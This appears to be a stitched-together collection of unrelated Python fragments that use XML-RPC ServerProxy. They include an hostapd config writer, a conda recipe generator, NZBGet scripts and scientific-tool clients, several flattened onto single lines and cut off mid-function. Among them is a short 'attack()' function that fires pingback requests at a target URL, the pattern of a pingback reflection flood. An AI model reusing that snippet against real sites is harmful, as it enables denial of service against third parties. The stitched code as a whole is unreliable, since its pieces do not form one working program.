    __options = {'a': "auth_algs=", 'b': "beacon_int=", 'c': "channel=",
                 'd': "driver=", 'h': "hw_mode=", 'i': "interface=",
                 'k': "wpa_key_mgmt=", 'm': "ieee80211", 'n': "country_code=",
                 's': "ssid=", 't': "basic_rates=", 'u': "supported_rates=",
                 'w': "wpa_passphrase=", 'y': "wpa_pairwise=",
                 'z': "rsn_pairwise=", 'wpa': "wpa=",
                 'wep_def': "wep_default_key=", 'key': 'wep_key',
                 'x': 'ieee8021x=', 'asa': 'auth_server_addr=',
                 'asp': 'auth_server_port=',
                 'ass': 'auth_server_shared_secret=', 'msg': 'eap_message=',
                 }

    # Operations
    def __init__(self, name, server_ip, server_port='80'):
        """Generates a configuration file.

        `name` specifies the name of the configuration file.

        Example:
        ----
        | **Settings** | *Arguments* | |
        | Library | configuration_file_name | server_ip |
        ----
        """
        ConfFile.__init__(self, name)
        self.proxy = ServerProxy("http://" + server_ip + ":" + server_port,
                                 allow_none=False)

    def auth_algs(self, auth):
        """Specify the authentication algorithm: 1=Open, 2=Shared, 3=Both."""
        self.stream_edit(self.__options['a'] + '.*', self.__options['a'] + auth)

    def beacon_interval(self, b_int):
        """Set the beacon interval of the AP, e.g. ``100``."""
        self.stream_edit(self.__options['b'] + '.*', self.__options['b'] + b_int)

    def channel(self, chan):
        """Set the operating channel, e.g. ``1`` (center freq 2412 MHz)."""
        self.stream_edit(self.__options['c'] + '.*',
                         self.__options['c'] + str(chan))

    def driver(self, driv):
        """Specify the driver, e.g. ``nl80211``."""
        self.stream_edit(self.__options['d'] + '.*', self.__options['d'] + driv)

    def interface(self, iface='wlan0'):
        """Select the wireless interface (default ``wlan0``)."""
        self.stream_edit(self.__options['i'] + '.*', self.__options['i'] + iface)

    def mode(self, std):
        """Select the operating standard.

        Accepts ``a``, ``b``, ``g``, the 2.4 GHz 802.11n aliases
        (``n``/``n2.4``/``n2.4G``/``n2.4GHz``), the 5 GHz aliases
        (``n5``/``n5G``/``n5GHz``) and ``ac``.
        (FIX: the docstring previously opened with four quotes.)
        """
        n2g = ['n', 'n2.4', 'n2.4G', 'n2.4GHz']
        n5g = ['n5', 'n5G', 'n5GHz']
        if std == 'a' or std == 'b' or std == 'g':
            self.stream_edit(self.__options['h'] + '.*',
                             self.__options['h'] + std)
        if std in n2g:
            # 802.11n on 2.4 GHz: base hw_mode g plus ieee80211n=1.
            self.stream_edit(self.__options['h'] + '.*',
                             self.__options['h'] + 'g')
            self.stream_edit(self.__options['m'] + '.*',
                             self.__options['m'] + 'n=1')
        if std in n5g:
            # 802.11n on 5 GHz: base hw_mode a plus ieee80211n=1.
            self.stream_edit(self.__options['h'] + '.*',
                             self.__options['h'] + 'a')
            self.stream_edit(self.__options['m'] + '.*',
                             self.__options['m'] + 'n=1')
        if std == 'ac':
            self.stream_edit(self.__options['h'] + '.*',
                             self.__options['h'] + 'a')
            self.stream_edit(self.__options['m'] + '.*',
                             self.__options['m'] + 'ac=1')
            # Explicit rate directives do not apply to 802.11ac.
            self.delete(self.__options['t'] + '.*')
            self.delete(self.__options['u'] + '.*')

    def country_code(self, nation='IN'):
        """Set the country of operation (default ``IN``)."""
        self.stream_edit(self.__options['n'] + '.*',
                         self.__options['n'] + nation)

    def ap_ssid(self, nw_name):
        """Set the SSID for the AP, e.g. ``myAP``."""
        self.stream_edit(self.__options['s'] + '.*',
                         self.__options['s'] + nw_name)

    def _drop_radius_settings(self):
        # Remove all RADIUS/802.1X related directives.
        for opt in ('x', 'asa', 'asp', 'ass', 'msg'):
            self.delete(self.__options[opt] + '.*')

    def wpa_key_mgmt(self, wpa_key='WPA2-PSK'):
        """Select WPA key management (case sensitive): NONE, WPA-PSK,
        WPA2-PSK, WPA/WPA2-PSK, WPA-Radius, WPA2-Radius or WPA/WPA2-Radius.

        When WPA/WPA2-PSK is used, select appropriate pairwise mechanisms.
        """
        if wpa_key == 'NONE':
            # Open network: drop every WPA/RADIUS directive.
            for opt in ('k', 'w', 'y', 'z', 'wpa'):
                self.delete(self.__options[opt] + '.*')
            self._drop_radius_settings()
        psk_wpa = {'WPA-PSK': '1', 'WPA2-PSK': '2', 'WPA/WPA2-PSK': '3'}
        if wpa_key in psk_wpa:
            self.stream_edit(self.__options['wpa'] + '.*',
                             self.__options['wpa'] + psk_wpa[wpa_key])
            self.stream_edit(self.__options['k'] + '.*',
                             self.__options['k'] + 'WPA-PSK')
            self._drop_radius_settings()
        radius_wpa = {'WPA-Radius': '1', 'WPA2-Radius': '2',
                      'WPA/WPA2-Radius': '3'}
        if wpa_key in radius_wpa:
            self.stream_edit(self.__options['x'] + '.*',
                             self.__options['x'] + '1')
            self.stream_edit(self.__options['wpa'] + '.*',
                             self.__options['wpa'] + radius_wpa[wpa_key])
            self.stream_edit(self.__options['k'] + '.*',
                             self.__options['k'] + 'WPA-EAP')
        # WEP settings are mutually exclusive with WPA.
        self.delete(self.__options['wep_def'] + '.*')
        self.delete(self.__options['key'] + '.*')

    def auth_server(self, ip, port):
        '''Set the RADIUS server address and port, e.g.
        ``| auth server | 192.168.43.3 | 1812 |``.

        FIX: `self` was missing from the signature, so the method raised a
        TypeError when called and its body could not resolve `self`.
        '''
        self.stream_edit(self.__options['asa'] + '.*',
                         self.__options['asa'] + str(ip))
        self.stream_edit(self.__options['asp'] + '.*',
                         self.__options['asp'] + str(port))

    def auth_server_secret(self, shared_secret):
        '''Set the RADIUS shared secret (FIX: added missing `self`).'''
        self.stream_edit(self.__options['ass'] + '.*',
                         self.__options['ass'] + str(shared_secret))

    def eap_msg(self, msg):
        '''Customise the RADIUS server's EAP message (FIX: added missing `self`).'''
        self.stream_edit(self.__options['msg'] + '.*',
                         self.__options['msg'] + msg)

    def wpa_passphrase(self, wpa_pass):
        """Set the password used with any WPA mechanism."""
        self.stream_edit(self.__options['w'] + '.*',
                         self.__options['w'] + wpa_pass)

    def basic_rates(self, *br):
        """Set the AP's basic rates, e.g. ``10 20 55 110``."""
        self.stream_edit(self.__options['t'] + '.*',
                         self.__options['t'] + ' '.join(br))

    def supported_rates(self, *sr):
        """Set the AP's supported rates, e.g. ``10 20 55 110``."""
        self.stream_edit(self.__options['u'] + '.*',
                         self.__options['u'] + ' '.join(sr))

    def wpa_pairwise(self, *w_pair):
        """Set the WPA encryption protocol(s), e.g. ``TKIP CCMP``."""
        self.stream_edit(self.__options['y'] + '.*',
                         self.__options['y'] + ' '.join(w_pair))

    def rsn_pairwise(self, r_pair):
        """Set the RSN encryption protocol, e.g. ``CCMP``."""
        self.stream_edit(self.__options['z'] + '.*',
                         self.__options['z'] + r_pair)

    def wep_default_key(self, w_def=0):
        """Select the default WEP key index (default 0)."""
        self.stream_edit(self.__options['wep_def'] + '.*',
                         self.__options['wep_def'] + str(w_def))

    def wep_key(self, key, key_no=0):
        """Set WEP key number *key_no* (0-3) to *key*.

        FIX: the original compared `key_no` against the strings '0'..'3'
        while the default was the integer 0, so calls using the default (or
        any int) silently skipped writing the key.
        """
        key_no = str(key_no)
        if key_no in ('0', '1', '2', '3'):
            self.stream_edit(self.__options['key'] + key_no + '.*',
                             self.__options['key'] + key_no + '=' + key)
        # WPA/RADIUS settings are mutually exclusive with WEP.
        for opt in ('k', 'w', 'y', 'z', 'wpa'):
            self.delete(self.__options[opt] + '.*')
        self._drop_radius_settings()

    def serve_ap(self, status):
        """Enable or disable the AP: ``start`` / ``stop`` (case sensitive)."""
        filename = path.join(self.getpath(), self.name)
        # Ship the full configuration file contents to the remote board.
        with open(filename, 'r') as conf:
            data = conf.readlines()
        hotspot = 'True'
        iface = ''
        self.proxy.board(status, data, hotspot, iface)

    def is_connected(self, sta_mac=''):
        """Verify that station *sta_mac* is associated with the AP; raise
        an Exception otherwise."""
        c_mac = self.proxy.verify_connection()
        if sta_mac not in c_mac:
            raise Exception("Station is not connected")

    def run_command(self, cmd):
        """Run *cmd* on the remote machine and return the result."""
        return self.proxy.run_cmd(cmd)

    def reset_conf(self, default=False):
        """Reset the AP configuration to empty, or (``default=True``) write
        a default WPA2-PSK configuration for new users."""
        default = bool(default)
        # Both paths start by clearing the current configuration.
        self.delete()
        if default:
            self.wpa_passphrase('12345678')
            self.interface('wlan0')
            self.driver('nl80211')
            self.ap_ssid('AccessPoint')
            self.channel(1)
            self.mode('g')
            self.wpa_key_mgmt('WPA2-PSK')
            self.wpa_pairwise('CCMP')
            self.rsn_pairwise('CCMP')
def main(args, parser):
    """Generate conda recipe skeletons for PyPI packages.

    For each package in ``args.packages``: query PyPI over XML-RPC for
    versions, release metadata and source URLs, optionally download and
    unpack the sdist to extract dependencies/entry points by faking
    setuptools' setup(), then write meta.yaml / build.sh / bld.bat under
    ``args.output_dir``.
    """
    if len(args.packages) > 1 and args.download:
        # Because if a package's setup.py imports setuptools, it will make all
        # future packages look like they depend on distribute. Also, who knows
        # what kind of monkeypatching the setup.pys out there could be doing.
        print("WARNING: building more than one recipe at once without "
              "--no-download is not recommended")
    proxies = get_proxy_servers()

    if proxies:
        transport = RequestsTransport()
    else:
        transport = None
    client = ServerProxy(args.pypi_url, transport=transport)
    package_dicts = {}
    [output_dir] = args.output_dir
    indent = '\n - '  # YAML list-item separator used throughout the templates

    all_packages = client.list_packages()
    all_packages_lower = [i.lower() for i in all_packages]

    # Packages may be re-queued (case correction, --recursive deps), so this
    # is a worklist loop rather than a plain for.
    while args.packages:
        package = args.packages.pop()
        dir_path = join(output_dir, package.lower())
        if exists(dir_path):
            raise RuntimeError("directory already exists: %s" % dir_path)
        # Template substitution dict with commented-out defaults.
        d = package_dicts.setdefault(
            package,
            {
                'packagename': package.lower(),
                'run_depends': '',
                'build_depends': '',
                'entry_points': '',
                'build_comment': '# ',
                'test_commands': '',
                'usemd5': '',
                'entry_comment': '#',
                'egg_comment': '#'
            })
        d['import_tests'] = valid(package).lower()
        if d['import_tests'] == '':
            d['import_comment'] = '# '
        else:
            d['import_comment'] = ''
            d['import_tests'] = indent + d['import_tests']

        if args.version:
            # Explicit version requested: verify it exists on PyPI.
            [version] = args.version
            versions = client.package_releases(package, True)
            if version not in versions:
                sys.exit("Error: Version %s of %s is not available on PyPI."
                         % (version, package))
            d['version'] = version
        else:
            versions = client.package_releases(package)
            if not versions:
                # The xmlrpc interface is case sensitive, but the index itself
                # is apparently not (the last time I checked,
                # len(set(all_packages_lower)) == len(set(all_packages)))
                if package.lower() in all_packages_lower:
                    print("%s not found, trying %s" %
                          (package, package.capitalize()))
                    # Re-queue under the canonical capitalisation.
                    args.packages.append(all_packages[all_packages_lower.index(
                        package.lower())])
                    del package_dicts[package]
                    continue
                sys.exit("Error: Could not find any versions of package %s" %
                         package)
            if len(versions) > 1:
                print("Warning, the following versions were found for %s" %
                      package)
                for ver in versions:
                    print(ver)
                print("Using %s" % versions[0])
                print("Use --version to specify a different version.")
            d['version'] = versions[0]

        data = client.release_data(package, d['version'])
        urls = client.release_urls(package, d['version'])
        if not args.all_urls:
            # Try to find source urls
            urls = [url for url in urls if url['python_version'] == 'source']
        if not urls:
            if 'download_url' in data:
                # Fall back to the metadata download_url; no md5 is available
                # in that case, so the md5 line is commented out via 'usemd5'.
                urls = [defaultdict(str, {'url': data['download_url']})]
                urls[0]['filename'] = urls[0]['url'].split('/')[-1]
                d['usemd5'] = '#'
            else:
                sys.exit("Error: No source urls found for %s" % package)
        if len(urls) > 1 and not args.noprompt:
            print("More than one source version is available for %s:" %
                  package)
            for i, url in enumerate(urls):
                print("%d: %s (%s) %s" % (i, url['url'],
                                          human_bytes(url['size']),
                                          url['comment_text']))
            n = int(input("Which version should I use? "))
        else:
            n = 0

        print("Using url %s (%s) for %s." %
              (urls[n]['url'], urls[n]['size'], package))
        d['pypiurl'] = urls[n]['url']
        d['md5'] = urls[n]['md5_digest']
        d['filename'] = urls[n]['filename']

        d['homeurl'] = data['home_page']
        d['summary'] = repr(data['summary'])
        # Extract license names from trove classifiers when present.
        license_classifier = "License :: OSI Approved ::"
        if 'classifiers' in data:
            licenses = [
                classifier.split(license_classifier, 1)[1]
                for classifier in data['classifiers']
                if classifier.startswith(license_classifier)
            ]
        else:
            licenses = []
        if not licenses:
            if data['license']:
                if args.noprompt:
                    license = data['license']
                elif '\n' not in data['license']:
                    print('Using "%s" for the license' % data['license'])
                    license = data['license']
                else:
                    # Some projects put the whole license text in this field
                    print("This is the license for %s" % package)
                    print()
                    print(data['license'])
                    print()
                    license = input("What license string should I use? ")
            else:
                if args.noprompt:
                    license = "UNKNOWN"
                else:
                    license = input(
                        ("No license could be found for %s on " +
                         "PyPI. What license should I use? ") % package)
        else:
            license = ' or '.join(licenses)
        d['license'] = license

        # Unfortunately, two important pieces of metadata are only stored in
        # the package itself: the dependencies, and the entry points (if the
        # package uses distribute). Our strategy is to download the package
        # and "fake" distribute/setuptools's setup() function to get this
        # information from setup.py. If this sounds evil, keep in mind that
        # distribute itself already works by monkeypatching distutils.
        if args.download:
            import yaml
            print("Downloading %s (use --no-download to skip this step)" %
                  package)
            tempdir = mkdtemp('conda_skeleton_' + package)
            if not isdir(SRC_CACHE):
                makedirs(SRC_CACHE)
            try:
                # Download it to the build source cache. That way, you have
                # it.
                download_path = join(SRC_CACHE, d['filename'])
                if not isfile(download_path) or hashsum_file(
                        download_path, 'md5') != d['md5']:
                    download(d['pypiurl'], join(SRC_CACHE, d['filename']))
                else:
                    print("Using cached download")
                print("Unpacking %s..." % package)
                unpack(join(SRC_CACHE, d['filename']), tempdir)
                print("done")
                print("working in %s" % tempdir)
                src_dir = get_dir(tempdir)
                run_setuppy(src_dir, tempdir, args)
                # NOTE(review): yaml.load without a Loader is unsafe on
                # untrusted input; pkginfo.yaml is produced locally by
                # run_setuppy, so this is trusted data here.
                with open(join(tempdir, 'pkginfo.yaml'),
                          encoding='utf-8') as fn:
                    pkginfo = yaml.load(fn)

                setuptools_build = pkginfo['setuptools']
                setuptools_run = False
                # Look at the entry_points and construct console_script and
                # gui_scripts entry_points for conda
                entry_points = pkginfo['entry_points']
                if entry_points:
                    if isinstance(entry_points, str):
                        # makes sure it is left-shifted
                        newstr = "\n".join(x.strip()
                                           for x in entry_points.split('\n'))
                        config = configparser.ConfigParser()
                        entry_points = {}
                        try:
                            config.readfp(StringIO(newstr))
                        except Exception as err:
                            print("WARNING: entry-points not understood: ",
                                  err)
                            print("The string was", newstr)
                            entry_points = pkginfo['entry_points']
                        else:
                            # ini-style entry points imply a setuptools
                            # runtime dependency.
                            setuptools_run = True
                            for section in config.sections():
                                if section in [
                                        'console_scripts', 'gui_scripts'
                                ]:
                                    value = [
                                        '%s=%s' %
                                        (option, config.get(section, option))
                                        for option in config.options(section)
                                    ]
                                    entry_points[section] = value
                    if not isinstance(entry_points, dict):
                        print(
                            "WARNING: Could not add entry points. They were:")
                        print(entry_points)
                    else:
                        cs = entry_points.get('console_scripts', [])
                        gs = entry_points.get('gui_scripts', [])
                        # We have *other* kinds of entry-points so we need
                        # setuptools at run-time
                        if not cs and not gs and len(entry_points) > 1:
                            setuptools_build = True
                            setuptools_run = True
                        entry_list = (
                            cs
                            # TODO: Use pythonw for these
                            + gs)
                        if len(cs + gs) != 0:
                            d['entry_points'] = indent.join([''] + entry_list)
                            d['entry_comment'] = ''
                            d['build_comment'] = ''
                            d['test_commands'] = indent.join(
                                [''] + make_entry_tests(entry_list))
                if pkginfo[
                        'install_requires'] or setuptools_build or setuptools_run:
                    if isinstance(pkginfo['install_requires'], string_types):
                        pkginfo['install_requires'] = [
                            pkginfo['install_requires']
                        ]
                    deps = []
                    for dep in pkginfo['install_requires']:
                        spec = spec_from_line(dep)
                        if spec is None:
                            sys.exit("Error: Could not parse: %s" % dep)
                        deps.append(spec)

                    if 'setuptools' in deps:
                        # Explicit dependency: no need to inject it again.
                        setuptools_build = False
                        setuptools_run = False
                        d['egg_comment'] = ''
                        d['build_comment'] = ''
                    # bool * list trick: prepends 'setuptools' only when True.
                    d['build_depends'] = indent.join(
                        [''] + ['setuptools'] * setuptools_build + deps)
                    d['run_depends'] = indent.join(
                        [''] + ['setuptools'] * setuptools_run + deps)

                    if args.recursive:
                        for dep in deps:
                            dep = dep.split()[0]
                            if not exists(join(output_dir, dep)):
                                args.packages.append(dep)

                if pkginfo['packages']:
                    deps = set(pkginfo['packages'])
                    if d['import_tests']:
                        olddeps = [
                            x for x in d['import_tests'].split() if x != '-'
                        ]
                        deps = set(olddeps) | deps
                    d['import_tests'] = indent.join([''] + sorted(deps))
                    d['import_comment'] = ''
            finally:
                rm_rf(tempdir)

    # All metadata gathered; render the recipe files.
    for package in package_dicts:
        d = package_dicts[package]
        makedirs(join(output_dir, package.lower()))
        print("Writing recipe for %s" % package.lower())
        with open(join(output_dir, package.lower(), 'meta.yaml'), 'w',
                  encoding='utf-8') as f:
            f.write(PYPI_META.format(**d))
        with open(join(output_dir, package.lower(), 'build.sh'), 'w',
                  encoding='utf-8') as f:
            f.write(PYPI_BUILD_SH.format(**d))
        with open(join(output_dir, package.lower(), 'bld.bat'), 'w',
                  encoding='utf-8') as f:
            f.write(PYPI_BLD_BAT.format(**d))

    print("Done")
def attack(): server = ServerProxy(pingbackURL) try: server.pingback.ping(hugeFile % randint(10, 1000), targetURL) except: pass
import sys import time from xmlrpclib import ServerProxy from pprint import pprint client = ServerProxy("http://217.116.6.26:8002/") client = ServerProxy("http://127.0.0.1:8002/") # INFO print 'Method info()' re = client.info() assert re != None print '\tInfo:', re # PING print '\nMethod ping()' for i in range(4): begin = time.time() print "\tPinging server.. ", re = client.ping() print "%.3f secs" % (time.time() - begin) time.sleep(1) # SEARCH print '\nMethod search()' search = {'creator_id': 1} # search by dictionary re = client.search(search) assert type(re) == list print '\tSearch results:', re
def __init__(self, email, apikey='', password=''): self.apikey = apikey self.password = password self.email = sanitize_email(email) self.email_hash = md5_hash(self.email) self._server = ServerProxy(self.API_URI.format(self.email_hash))
if not os.environ.get('NZBPO_NZB_DIR'): print "[ERROR] Fehler bei der angabe des NZB_DIR.... Bitte ueberpruefen" sys.exit(POSTPROCESS_ERROR) if not os.path.isdir(os.environ.get('NZBPO_NZB_DIR')): print "[ERROR] Der angegebene Pfad is kein Verzeichnis... Bitte ueberprufen!" sys.exit(POSTPROCESS_ERROR) # Logger um das Passwort fest zu stellen!! host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (username, password, host, port) server = ServerProxy(rpcUrl) postqueue = server.postqueue(10000) log = postqueue[0]['Log'] print "[INFO] Messages von der NZB Datei werden eingelesen und verarbeitet." print "[INFO] Passwortliste wird eingelesen und verarbeitet." if len(log) > 0: for entry in log: log_content = ((u'%s\n' % (entry['Text'])).encode('utf8')) # Eilesen der Passwortlist welche in NZBGet hinterlegt wurde als Pfad angabe with open(os.environ['NZBOP_UNPACKPASSFILE'], "r") as passwort_liste: for liste1 in passwort_liste: liste = (liste1.rstrip()) if liste in log_content: passwort_liste.close()
def setUpClass(cls): cls.server = ServerProxy("http://" + HOSTNAME + ":" + str(TEST_PORT), allow_none=True) cls.auth_data = Authentication.read_auth_data(AUTH_FILE)
def update_pymol(self, indices): rpc_port = 9123 if indices: frames = [] for indice in indices: i, j = self.id_to_H_frame[indice] frames = np.concatenate( (frames, np.trim_zeros(self.H_frame[i, j], "b"))) nb_frames = frames.shape[0] if nb_frames > self.max_frame: print( "Too much frames (%s). So we choose %s structures randomly." % (nb_frames, self.max_frame)) frames = random.sample(frames, self.max_frame) try: pymol = ServerProxy(uri="http://localhost:%s/RPC2" % rpc_port) pymol.do("delete s*") for frame in frames: frame = np.int(frame) # Go to the frame self.u.trajectory[frame] # Write the PDB file self.u.atoms.write("structure.pdb") try: pymol.load("%s/structure.pdb" % os.getcwd()) except: print("Can\"t load PDB structure !") pass if self.cartoon: pymol.show("cartoon") else: pymol.show("ribbon") pymol.hide("lines") pymol.do("copy s%s, structure" % frame) pymol.delete("structure") pymol.do("show sticks, organic") if np.int(frames[0]) != frame and nb_frames > 1: pymol.do("align s%d, s%d" % (frame, frames[0])) pymol.do("center s%s" % frame) except: print("Connection issue with PyMol! (Cmd: pymol -R)")
# -*- coding: utf-8 -*- """ Created on Fri Mar 31 09:10:14 2017 @author: ros """ from xmlrpclib import ServerProxy s=ServerProxy('http://ubuntu:5678/') caller_id='/turtlesim' topic='/turtle1/cmd_vel' protocols=[['TCPROS']] s.requestTopic(caller_id, topic, protocols)
# First we need to know connection info: host, port and password of NZBGet server. # NZBGet passes all configuration options to post-processing script as # environment variables. host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] if host == '0.0.0.0': host = '127.0.0.1' # Build a URL for XML-RPC requests rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (quote(username), quote(password), host, port) # Create remote server object server = ServerProxy(rpcUrl) # Call remote method 'loadlog' nzbid = int(os.environ['NZBPP_NZBID']) log = server.loadlog(nzbid, 0, 10000) # Now iterate through entries and save them to the output file if len(log) > 0: f = open('%s/_nzblog.txt' % os.environ['NZBPP_DIRECTORY'], 'wb') for entry in log: f.write( (u'%s\t%s\t%s\n' % (entry['Kind'], datetime.datetime.fromtimestamp(int( entry['Time'])), entry['Text'])).encode('utf8')) f.close()
def testXmlRpc(self): scheme = 'http' try: scheme = self.harness.scheme except AttributeError: pass if scheme == 'https': url = 'https://%s:%s/xmlrpc/' % (self.interface(), self.PORT) proxy = ServerProxy(url, transport=HTTPSTransport()) else: url = 'http://%s:%s/xmlrpc/' % (self.interface(), self.PORT) proxy = ServerProxy(url) self.getPage('/xmlrpc/foo') self.assertBody('Hello world!') self.assertEqual(proxy.return_single_item_list(), [42]) self.assertNotEqual(proxy.return_single_item_list(), 'one bazillion') self.assertEqual(proxy.return_string(), 'here is a string') self.assertEqual(proxy.return_tuple(), list( ('here', 'is', 1, 'tuple'))) self.assertEqual(proxy.return_dict(), {'a': 1, 'c': 3, 'b': 2}) self.assertEqual(proxy.return_composite(), [{ 'a': 1, 'z': 26 }, 'hi', ['welcome', 'friend']]) self.assertEqual(proxy.return_int(), 42) self.assertEqual(proxy.return_float(), 3.14) self.assertEqual(proxy.return_datetime(), DateTime((2003, 10, 7, 8, 1, 0, 1, 280, -1))) self.assertEqual(proxy.return_boolean(), True) self.assertEqual(proxy.test_argument_passing(22), 44) try: proxy.test_argument_passing({}) except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual( x.faultString, "unsupported operand type(s) for *: 'dict' and 'int'") else: self.fail('Expected xmlrpclib.Fault') try: proxy.non_method() except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual(x.faultString, 'method "non_method" is not supported') else: self.fail('Expected xmlrpclib.Fault') try: proxy.test_returning_Fault() except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual(x.faultString, 'custom Fault response') else: self.fail('Expected xmlrpclib.Fault')
def __init__(self, url): self.url = url self.proxy = ServerProxy(url, allow_none=1)
# For more info visit http://nzbget.net/RPC_API_reference # First we need to know connection info: host, port and password of NZBGet server. # NZBGet passes all configuration options to post-processing script as # environment variables. host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] if host == '0.0.0.0': host = '127.0.0.1' # Build an URL for XML-RPC requests rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (username, password, host, port) # Create remote server object server = ServerProxy(rpcUrl) if os.environ.get('NZBPO_STATISTICS') == 'yes': # Find correct nzb in method listgroups groups = server.listgroups(0) nzbID = int(os.environ['NZBPP_NZBID']) for nzbGroup in groups: if nzbGroup['NZBID'] == nzbID: break text += '\n\nStatistics:' # add download size DownloadedSize = float(nzbGroup['DownloadedSizeMB']) unit = ' MB' if DownloadedSize > 1024:
def main(self): globalErrorUtility.configure('codeimportdispatcher') dispatcher = CodeImportDispatcher(self.logger, self.options.max_jobs) dispatcher.findAndDispatchJobs( ServerProxy(config.codeimportdispatcher.codeimportscheduler_url))
def main(argv=[__name__]):
    """Command-line client for a FastROCS shape-search server.

    Reads a query molecule, submits it to the server over XML-RPC, polls
    the query status until completion (printing progress), and writes the
    returned results blob to the output file.

    Returns 0 on success, 1 on any error.
    """
    parser = argparse.ArgumentParser()

    # positional arguments retaining backward compatibility
    parser.add_argument(
        'server:port',
        help=
        'Server name and port number of database to search i.e. localhost:8080.'
    )
    parser.add_argument(
        'query',
        help=
        'File containing the query molecule to search (format not restricted to *.oeb).'
    )
    parser.add_argument(
        'results',
        help='Output file to store results (format not restricted to *.oeb).')
    parser.add_argument('nHits',
                        nargs='?',
                        type=int,
                        default=100,
                        help='Number of hits to return (default=100).')
    parser.add_argument(
        '--tversky',
        action='store_true',
        default=argparse.SUPPRESS,
        help='Switch to Tversky similarity scoring (default=Tanimoto).')
    parser.add_argument('--shapeOnly',
                        action='store_true',
                        default=argparse.SUPPRESS,
                        help='Switch to shape-only scores (default=Combo).')
    parser.add_argument(
        '--alternativeStarts',
        default=argparse.SUPPRESS,
        nargs=1,
        dest='altStarts',
        choices=('random', 'subrocs', 'inertialAtHeavyAtoms',
                 'inertialAtColorAtoms'),
        help='Optimize using alternative starts (default=inertial). '
        'To perform N random starts do "--alternativeStarts random N" (default N=10)'
    )

    known, remaining = parser.parse_known_args()
    dargs = vars(known)

    qfname = dargs.pop('query')
    numHits = dargs.pop('nHits')

    # Options left in dargs travel to the server as the option dictionary.
    startType = dargs.get('altStarts', None)
    if startType:
        dargs['altStarts'] = str(startType[0])
        # "--alternativeStarts random N": the trailing N ends up in
        # 'remaining' because of nargs=1 above.
        if len(remaining) == 1 and dargs['altStarts'] == 'random':
            try:
                numRands = int(remaining[0])
                dargs['randStarts'] = numRands
            except ValueError:
                print(
                    "Invalid argument given. See --help menu for argument list"
                )
                sys.exit()
        if len(remaining) > 1:
            print(
                "Too many arguments given. See --help menu for argument list")
            sys.exit()
    else:
        if remaining:
            print(
                "Too many arguments given. See --help menu for argument list")
            sys.exit()

    try:
        fh = open(qfname, 'rb')
    except IOError:
        sys.stderr.write("Unable to open '%s' for reading" % qfname)
        return 1

    iformat = GetFormatExtension(qfname)
    ofname = dargs.pop('results')
    oformat = GetFormatExtension(ofname)

    s = ServerProxy("http://" + dargs.pop('server:port'))
    data = Binary(fh.read())

    try:
        idx = s.SubmitQuery(data, numHits, iformat, oformat, dargs)
    except Fault as e:
        if "TypeError" in e.faultString:
            # we're trying to run against an older server, may be able
            # to still work if the formats ameniable.
            if ((iformat == ".oeb" or iformat == ".sq")
                    and oformat == ".oeb"):
                idx = s.SubmitQuery(data, numHits)
            else:
                sys.stderr.write(
                    "%s is too new of a version to work with the server %s\n"
                    % (argv[0], argv[1]))
                sys.stderr.write(
                    "Please upgrade your server to FastROCS version 1.4.0 or later to be able to use this client\n"
                )
                sys.stderr.write(
                    "This client will work with this version of the server if the input file is either"
                    "'.oeb' or '.sq' and the output file is '.oeb'\n")
                return 1
        else:
            sys.stderr.write(str(e))
            return 1

    # BUG FIX: 'first' was initialised to False, so the "current/total"
    # header below could never be printed; it must start True and flip
    # after the first status line.
    first = True
    while True:
        blocking = True
        try:
            current, total = s.QueryStatus(idx, blocking)
        except Fault as e:
            print(str(e), file=sys.stderr)
            return 1

        if total == 0:
            continue
        if first:
            print("%s/%s" % ("current", "total"))
            first = False
        print("%i/%i" % (current, total))
        if total <= current:
            break

    results = s.QueryResults(idx)

    # assuming the results come back as a string in the requested format
    with open(ofname, 'wb') as output:
        output.write(results.data)

    return 0
def __init__(self, url): self.analyzer = ServerProxy(url, encoding='utf-8')
def run(self):
    '''
    Run the client and perform all the operations:

    * Connect to the server.
    * Receive video while sniffing packets.
    * Close connection.
    * Process data and extract information.
    * Run measures.

    :returns: A dictionary of video files received
        (see :attr:`VideoTester.gstreamer.RTSPClient.files`),
        a dictionary of caps
        (see :attr:`VideoTester.gstreamer.RTSPClient.caps`)
        and a list of results
    :rtype: list
    '''
    VTLOG.info('Client running!')
    try:
        # Ask the XML-RPC control server to start an RTSP stream for us;
        # it answers with the RTSP port to connect to.
        tempdir, num = self.__get_tempdir()
        server = ServerProxy('http://%s:%s' % (self.conf['ip'], self.port))
        rtspport = server.run(self.conf['bitrate'], self.conf['framerate'])
    except Exception as e:
        VTLOG.error(e)
        return None
    VTLOG.info('Connected to XMLRPC Server at %s:%s' %
               (self.conf['ip'], self.port))
    VTLOG.info(
        'Evaluating: %s, %s, %s kbps, %s fps, %s' %
        (self.conf['video'], self.conf['codec'], self.conf['bitrate'],
         self.conf['framerate'], self.conf['protocol']))
    sniffer = Sniffer(self.conf['iface'], self.conf['ip'],
                      '%s%s.cap' % (tempdir, num))
    rtspclient = RTSPClient(tempdir + num, self.conf['codec'],
                            self.conf['bitrate'], self.conf['framerate'])
    url = 'rtsp://%s:%s/%s.%s' % (self.conf['ip'], rtspport,
                                  self.conf['video'], self.conf['codec'])
    # The sniffer runs in a separate process so it can capture packets
    # while this process receives the video.
    child = Process(target=sniffer.run)
    # 'ret' stays True on any failure path; only the 'else' clause (clean
    # reception) clears it.
    ret = True
    try:
        child.start()
        VTLOG.info('PID: %s | Sniffer started' % child.pid)
        # Give the sniffer a moment to start capturing before streaming.
        time.sleep(1)
        rtspclient.receive(url, self.conf['protocol'])
    except KeyboardInterrupt:
        VTLOG.warning('Keyboard interrupt!')
    except Exception as e:
        VTLOG.error(e)
    else:
        ret = False
    # Cleanup happens regardless of how reception ended.
